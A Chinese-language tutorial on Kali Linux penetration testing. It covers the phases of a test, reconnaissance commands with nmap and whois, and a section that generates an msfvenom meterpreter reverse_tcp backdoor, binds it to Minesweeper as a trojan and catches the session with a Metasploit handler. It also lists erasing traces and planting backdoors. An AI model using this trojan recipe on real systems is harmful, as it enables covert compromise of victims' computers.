怎样用kali-liunx进行安全渗透测试?
kali-liunx是集大成的开源渗透平台,基于Debian的Linux发行版,是BackTrack的升级换代产品,也就是说它是一个liunx系统,上面就像我们安装windows一样会安装一些应用程序,kali上默认将所带的工具集划分为十四个大类,分别是信息收集
、漏洞分析
、Web程序
、密码攻击
、无线攻击
、漏洞利用工具集
、嗅探/欺骗
、权限维持
、逆向工程
、压力测试
、硬件Hacking
、数字取证
、报告工具集
、系统服务
。这些大类中,很多工具是重复出现的,因为这些工具同时具有多种功能,大概有600多种工具,并且支持新增。
Kali-Liunx安装完成后,不要着急进行安全渗透,先把大体方向弄明白。这里介绍一下安全渗透的行业标准PETS,即前期沟通、信息收集、威胁建模、漏洞分析、渗透攻击、后渗透测试、测试报告
。
-
前期沟通,即了解需要安全渗透方向。安全渗透大体可以分为面向服务器层、应用层、网络层,其中服务器层主要有系统、防火墙;应用层主要有中间件、应用、数据库;网络层主要有无线、内网、外网。针对这些方向,具体应用到你需要进行安全渗透的系统中。如果没有具体的需求,那么就按照等级保护的标准进行。
-
信息收集,主要分为被动信息收集和主动信息收集。其中,被动信息收集主要需要域名、邮箱、成员、地址、搜索引擎(Goolge)、Metadata、专属密码字典(cupp)等;主动信息收集主要需要扫描IP地址段(NMAP)、其他服务扫描(SNMP)、识别防护机制(LBD)。
-
威胁建模从技术黑盒的角度进行威胁建模,其结果作为渗透测试报告的一部分。包括传统威胁建模方法(资产/攻击者)、PETS标准威胁建模方法(商业资产、商业流程、威胁主体、威胁能力、企业专有的威胁模型)、动机建模、影响建模。
-
漏洞分析主要有漏洞扫描(Nessus)、已知漏洞利用(Metesploit)和Web扫描(Nikto)。一般的,应用安全渗透包括,SQL注入漏洞,cookies注入漏洞,文件上传截断漏洞,目录遍历漏洞,URL跳转漏洞,在线编辑器漏洞,网站身份验证过滤漏洞,PHP远程代码执行漏洞,数据库暴库漏洞,网站路径漏洞,XSS跨站漏洞,默认后台及弱口令漏洞,任意文件下载漏洞,网站代码远程溢出漏洞,修改任意账号密码漏洞,程序功能上的逻辑漏洞,任意次数短信发送、任意手机号码或邮箱注册漏洞后台或者api接口安全认证绕过漏洞等等的安全渗透测试。服务器和网络安
全渗透包括,内网渗透,FTP提权漏洞,SQL Server数据库提权,Mysql提权漏洞,linux本地溢出漏洞,替换系统服务漏洞,远程桌面认证绕过漏洞,端口映射漏洞,CC压力测试,DDOS压力测试,arp欺骗篡改页面测试,DNS欺骗漏洞,会话劫持漏洞,以及虚拟主机等众多应用程序系统的漏洞测试。 -
渗透攻击,顾名思义,就是对已经找出的漏洞,利用工具模拟攻击。包括密码破解(Hydra)、社会工程(Metasploit)、Wifi渗透(Wifite)、免杀编码绕过(Webshell编码和过滤绕过)、未知漏洞挖掘(Fuzzing)。
-
后渗透测试,保留给安全渗透人员特权。包括内网扫描、抓包分析、地址欺骗、本地提权、获取数据、擦除痕迹、留后门。
-
测试报告即整个安全渗透过程的总结,分管理层报告:风险级别、风险分类、整改规划;技术报告:漏洞细节、漏洞复现、修补方案。
0x00
kali是由BackTrack发展而来,可以帮助专业人士识别安全性问题,验证漏洞的缓解措施。它基于Linux内核,主要功能是渗透测试。kali系统内部集成了很多常用的模块,按功能分类的话可如图所示:
kali集成的模块
内部的常用模块比如MSFconsole,Nmap等。如果想要查看主机服务的版本信息,也可以直接输入sysinfo命令等。
渗透测试就是模拟黑客入侵手段,对目标网络进行安全测试,从而发现目标网络的漏洞,对目标网络进行安全加固与漏洞修复。
0x01
信息收集对于渗透来说非常重要,收集的信息越详细对以后渗透测试的影响越大。
被动信息收集(无交互,不会被发现):
-
kali终端下输入相关信息查询命令。
如:ping www.baidu.com。能得到对应的IP地址。(事实上,淘宝使用CDN,得到的IP不是真实web服务器的IP地址)
-
whois信息收集
如:whois taobao.com。可以获得注册人员的一些信息
- DNS信息收集
如:host -t ns baidu.com。对百度域名的DNS服务器进行查询。
- 主机发现
如:nmap -sP 10.1.1.0/24。使用nmap扫描网段中在线主机数目。(-sP替换成-sn:探测网络内存活主机,不做端口扫描)
- 端口扫描
如:nmap -p 1-65535 10.1.1.100。(显示:端口号,状态,服务类型)
- 指纹探测
如:nmap -O 10.1.1.100。指纹探索就是目标主机的系统版本、服务版本、目标站点使用的CMS版本进行探测。
- 应该注意目标主机开放了哪些端口,以及对应的服务。加上-sV参数探测详细的服务版本号。
如:nmap -sV -p 1-65535 10.1.1.100
0x02
kali透析Windows服务器
- 获得攻击机的IP地址,使用msfvenom命令生成setup的后门程序。
如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.102 -f exe > setup.exe
-
修改setup.exe的属性,允许此文件作为程序运行。并将后门程序共享至目标主机。
-
在攻击机中启动msf,输入use exploit/multi/handler加载监听模块。
-
利用ExeBinder.exe捆绑软件,将上面生成的木马程序与某个软件进行绑定。如扫雷。
-
检测目标主机,对目标主机进行渗透测试。
目标主机运行程序后,msf开始渗透,宿儒sessions,可以看到目标主机的IP。
继续输入sessions -i 1,可以对目标主机进行一系列的操作。如输入sysinfo可知目标主机的系统信息,输入getuid查看对方正在运行的用户。
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。